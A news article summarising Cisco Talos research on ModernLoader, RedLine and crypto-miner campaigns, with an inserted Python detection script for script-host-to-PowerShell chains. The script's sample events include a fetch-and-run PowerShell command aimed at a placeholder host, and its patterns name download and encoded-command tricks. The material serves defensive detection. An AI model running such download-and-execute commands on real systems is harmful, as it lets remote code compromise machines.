
Unknown Threat Actor Drops ModernLoader, RedLine and Crypto Miners


ModernLoader is a new remote access trojan detected by Cisco Talos researchers.

ModernLoader Campaigns in the Wild

More specifically, the researchers analyzed three separate but related campaigns between March and June 2022 that delivered ModernLoader, RedLine and several cryptocurrency miners.

In these attacks, the threat actors use PowerShell, .NET, HTA (HTML Application) and VBS files, eventually deploying malware such as SystemBC and DCRat. The final payload of the campaigns is the aforementioned ModernLoader remote access trojan, which is capable of harvesting system information and deploying numerous modules.
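The delivery chain described above (an HTA or VBS file handed to a Windows script host, which then launches PowerShell) leaves a recognisable parent/child trace in process-creation telemetry. The following detection sketch is an added example for defenders and is not Cisco Talos tooling or code from the campaign; the event fields mimic a small subset of Sysmon process-creation data, and all sample events, paths and the `example.invalid` URL are constructed for illustration.

```python
"""
Flag the script-host -> PowerShell chain in process-creation events.

Added example, not Cisco Talos tooling. The log format is a constructed
subset of Sysmon process-creation fields (Image, ParentImage, CommandLine);
the sample events below are invented for illustration.
"""
import re

# Windows script hosts that execute HTA and VBS files
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Interpreters the campaigns chain into after the initial script
NEXT_STAGE = {"powershell.exe", "pwsh.exe"}

# PowerShell command-line traits that warrant a closer look
SUSPICIOUS_ARGS = [
    re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),  # base64 payload
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),                     # hidden window
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr", re.I),  # remote fetch
]


def base_name(path):
    """Return the executable name in lower case, ignoring the directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event.

    Score 0 means nothing noteworthy. A script host spawning PowerShell is
    the strongest signal (+3); each suspicious PowerShell argument adds +1.
    """
    image = base_name(event["Image"])
    parent = base_name(event["ParentImage"])
    score, reasons = 0, []
    if parent in SCRIPT_HOSTS and image in NEXT_STAGE:
        score += 3
        reasons.append(f"{parent} spawned {image}")
    if image in NEXT_STAGE:
        for pattern in SUSPICIOUS_ARGS:
            if pattern.search(event["CommandLine"]):
                score += 1
                reasons.append(f"command line matches /{pattern.pattern}/")
    return score, reasons


def flag_events(events, threshold=3):
    """Return events whose score meets the threshold, with score and reasons attached."""
    flagged = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            flagged.append({**event, "score": score, "reasons": reasons})
    return flagged


# Constructed sample events (not real telemetry from the campaigns).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Scripts\\backup.ps1"},  # benign admin script
    {"Image": r"C:\Windows\System32\wscript.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "wscript.exe invoice.vbs"},  # script host alone: not yet a chain
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"},
]

if __name__ == "__main__":
    for hit in flag_events(SAMPLE_EVENTS):
        print(hit["score"], base_name(hit["ParentImage"]), "->", base_name(hit["Image"]), hit["reasons"])
```

The threshold of 3 means a plain script host launching PowerShell is enough to alert on its own; the argument heuristics only raise the priority. In an environment where VBS logon scripts legitimately start PowerShell, tune the threshold or allow-list known parent command lines rather than dropping the parent/child rule.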

“In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian,” Cisco Talos explained.

ModernLoader provides remote access to targeted computers enabling further malicious operations such as dropping more malware, stealing information, and adding the target to a botnet. Due to the use of various off-the-shelf tools, the attack campaigns are attributed to a previously unknown threat actor, possibly of Russian origin, targeting Eastern Europe (Bulgaria, Poland, Hungary, and Russia).

This unknown threat actor is compromising vulnerable WordPress and cPanel instances to drop the ModernLoader malware via fake Amazon gift cards. ModernLoader itself is a simple .NET remote access trojan that can collect system information, execute arbitrary commands, and download and run a file from the command-and-control server. This capability lets the threat actor swap modules in real time.

It is also noteworthy that the threat actor “has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” Despite the versatile approaches and technical tactics, Cisco Talos estimates that the success of the analyzed campaigns is limited.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum since the project started. A professional with 10+ years of experience in creating engaging content. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles! Follow Milena @Milenyim
